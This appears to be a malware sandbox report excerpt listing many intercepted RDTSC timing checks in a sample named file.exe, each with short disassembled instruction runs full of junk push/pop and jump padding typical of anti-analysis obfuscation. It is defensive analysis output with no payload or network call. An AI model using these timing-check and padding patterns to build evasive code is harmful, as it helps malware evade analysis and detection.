              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DF823 second address: 7DF82F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DFD80 second address: 7DFD84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DFD84 second address: 7DFD8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E019B second address: 7E01DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F292CD65AB6h 0x0000000a pushad 0x0000000b jmp 00007F292CD65AB6h 0x00000010 jl 00007F292CD65AA6h 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E01DA second address: 7E01DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E0371 second address: 7E0377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E0C4F second address: 7E0C78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F292CD152E6h 0x0000000a popad 0x0000000b pushad 0x0000000c jl 00007F292CD152E6h 0x00000012 jmp 00007F292CD152F5h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E0C78 second address: 7E0C84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push ebx 0x00000007 push ebx 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E3FE8 second address: 7E401C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD152EFh 0x00000007 jmp 00007F292CD152F4h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jnp 00007F292CD152E6h 0x00000015 pushad 0x00000016 popad 0x00000017 push edi 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F3C2C second address: 7F3C31 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F3C31 second address: 7F3C3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F3C3A second address: 7F3C40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F3C40 second address: 7F3C4D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F3C4D second address: 7F3C53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F3C53 second address: 7F3C57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F3DC5 second address: 7F3DDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F292CD65AB3h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F3DDF second address: 7F3DE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F8FD3 second address: 7F8FD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F8FD7 second address: 7F8FF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD152F8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F917A second address: 7F917E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F917E second address: 7F9184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F9184 second address: 7F918B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F918B second address: 7F9191 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F9191 second address: 7F91A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jl 00007F292CD65AB2h 0x0000000d jnc 00007F292CD65AA6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F930C second address: 7F9311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F9461 second address: 7F9465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F9465 second address: 7F9469 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F9469 second address: 7F9485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F292CD65AA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F292CD65AACh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F9485 second address: 7F9489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F9489 second address: 7F948F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F948F second address: 7F94AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007F292CD152E6h 0x0000000d push edi 0x0000000e pop edi 0x0000000f jp 00007F292CD152E6h 0x00000015 popad 0x00000016 popad 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A4999 second address: 7A499D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A499D second address: 7A49A7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F292CD152E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FF246 second address: 7FF24C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FF24C second address: 7FF255 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FF255 second address: 7FF261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FF261 second address: 7FF265 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FE4FC second address: 7FE505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 805179 second address: 805184 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 805DB9 second address: 805DBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80AF16 second address: 80AF2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F292CD152EFh 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80B1F1 second address: 80B1FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD65AAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80B1FF second address: 80B205 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80B205 second address: 80B20B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80B20B second address: 80B20F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80B354 second address: 80B35A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80B8FA second address: 80B90D instructions: 0x00000000 rdtsc 0x00000002 je 00007F292CD152E6h 0x00000008 jg 00007F292CD152E6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80B90D second address: 80B913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80B913 second address: 80B919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8181A0 second address: 8181A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8181A6 second address: 8181C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F292CD152F9h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8182F7 second address: 818302 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81862B second address: 818631 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 818956 second address: 81896E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F292CD65AA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007F292CD65AAEh 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81896E second address: 818984 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F292CD152F1h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 818984 second address: 81899E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnc 00007F292CD65AA6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jp 00007F292CD65AC5h 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 818B19 second address: 818B44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F292CD152F1h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F292CD152F1h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 818E32 second address: 818E51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD65AB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 818E51 second address: 818E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 817D22 second address: 817D26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 817D26 second address: 817D55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c pop eax 0x0000000d jmp 00007F292CD152F0h 0x00000012 jmp 00007F292CD152F1h 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82212E second address: 822138 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 822138 second address: 82213E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82213E second address: 82214B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82D2D8 second address: 82D2ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F292CD152EFh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82D2ED second address: 82D2F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 830411 second address: 830415 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 830415 second address: 83042B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F292CD65AA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d pushad 0x0000000e push esi 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83042B second address: 830435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F292CD152E6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 830435 second address: 830449 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD65AACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 848509 second address: 848515 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F292CD152E6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 848515 second address: 848520 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 ja 00007F292CD65AA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 848520 second address: 84854D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F292CD152F8h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007F292CD15316h 0x00000012 jbe 00007F292CD15302h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 846CD5 second address: 846CF2 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F292CD65AA6h 0x00000008 jmp 00007F292CD65AAEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 846E7E second address: 846E86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 846E86 second address: 846E8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 846E8C second address: 846E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84703A second address: 84705F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jns 00007F292CD65AA6h 0x0000000e jl 00007F292CD65AA6h 0x00000014 popad 0x00000015 pop esi 0x00000016 pushad 0x00000017 ja 00007F292CD65AB2h 0x0000001d jno 00007F292CD65AA6h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84705F second address: 847091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F292CD152EAh 0x0000000a jnp 00007F292CD15300h 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F292CD152F8h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 847091 second address: 847097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 847097 second address: 84709B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8474F7 second address: 84751F instructions: 0x00000000 rdtsc 0x00000002 jno 00007F292CD65AA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007F292CD65AAEh 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F292CD65AADh 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84751F second address: 847526 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84826E second address: 848274 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 848274 second address: 84827A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84827A second address: 84827E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84C047 second address: 84C04D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84C04D second address: 84C051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84C051 second address: 84C06C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD152F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84C06C second address: 84C080 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD65AB0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84C080 second address: 84C086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84C086 second address: 84C0A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD65AABh 0x00000007 pushad 0x00000008 jmp 00007F292CD65AB3h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84C0A9 second address: 84C0AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8569CD second address: 856A09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jo 00007F292CD65AA6h 0x0000000c popad 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 jp 00007F292CD65AA6h 0x00000017 pop edi 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b je 00007F292CD65AA6h 0x00000021 jmp 00007F292CD65AB9h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 856A09 second address: 856A0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 856A0E second address: 856A18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F292CD65AA6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8670CB second address: 8670DC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007F292CD152E6h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8670DC second address: 867128 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F292CD65AA6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jp 00007F292CD65ACEh 0x00000012 jmp 00007F292CD65AAFh 0x00000017 jmp 00007F292CD65AB9h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F292CD65AB0h 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 867128 second address: 86712C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 866F16 second address: 866F23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 866F23 second address: 866F2D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F292CD152E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
